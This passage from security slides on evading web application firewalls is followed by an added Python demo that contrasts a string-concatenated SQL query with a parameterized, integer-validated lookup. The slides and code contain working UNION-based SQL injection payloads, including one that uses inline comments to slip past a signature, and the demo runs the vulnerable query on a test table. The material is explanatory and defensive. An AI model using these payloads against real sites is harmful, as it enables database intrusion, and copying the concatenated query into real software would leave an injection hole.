protection
• Like AV, these can be bypassed with the smallest tweak
• E.g. UNION SQL Injection Attack¹
• BLOCKED: /?id=1+union+select+1,2,3 /*
• NOT BLOCKED: /?id=1/*union*/union /*select*/ select+1,2,3 --
• After being processed, the request will become:
• index.php?id=1/*uni X on*/union /*sel X ect*/ select+1,2,3 --
• Query: "select * from somewhere where id=" + id
• Becomes: select * from somewhere where id=1 union select 1,2,3 --

1. Methods to Bypass a Web Application Firewall
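Added example, not part of the original slides: the slide's concatenated query next to a hardened lookup that validates the id and binds it as a parameter, so the result no longer depends on whether a signature matched. The regex signature, the SQLite table layout and the function names are assumptions made for illustration; real WAF rule sets differ.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# The two id values from the slide, as they appear in the query string.
BLOCKED = "1+union+select+1,2,3 /*"
NOT_BLOCKED = "1/*union*/union /*select*/ select+1,2,3 --"

# Assumed stand-in for a signature rule; not taken from any real WAF.
SIGNATURE = re.compile(r"union\s+select", re.IGNORECASE)


def signature_blocks(raw_id):
    """True when the assumed signature matches the decoded parameter."""
    return bool(SIGNATURE.search(unquote_plus(raw_id)))


def make_db():
    """Constructed in-memory table, named 'somewhere' as on the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table somewhere (id integer, name text, note text)")
    conn.execute("insert into somewhere values (1, 'alice', 'first row')")
    return conn


def lookup_concat(conn, raw_id):
    """The slide's query: the parameter is pasted into the SQL text."""
    query = "select * from somewhere where id=" + unquote_plus(raw_id)
    return conn.execute(query).fetchall()


def lookup_bound(conn, raw_id):
    """Hardened form: strict integer check, then a bound parameter."""
    try:
        value = int(unquote_plus(raw_id))
    except ValueError:
        return []  # not an integer id: reject instead of querying
    sql = "select * from somewhere where id = ?"
    return conn.execute(sql, (value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for raw in ("1", BLOCKED, NOT_BLOCKED):
        print(repr(raw), "signature hit:", signature_blocks(raw),
              "bound lookup:", lookup_bound(db, raw))
    print("concatenated lookup:", lookup_concat(db, NOT_BLOCKED))
```

The bound lookup returns the same rows for a legitimate id and nothing for either slide value, regardless of what the signature decided.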